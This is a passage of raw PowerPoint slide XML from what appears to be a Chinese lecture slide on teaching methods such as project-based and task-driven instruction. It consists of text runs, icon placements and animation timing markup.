                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
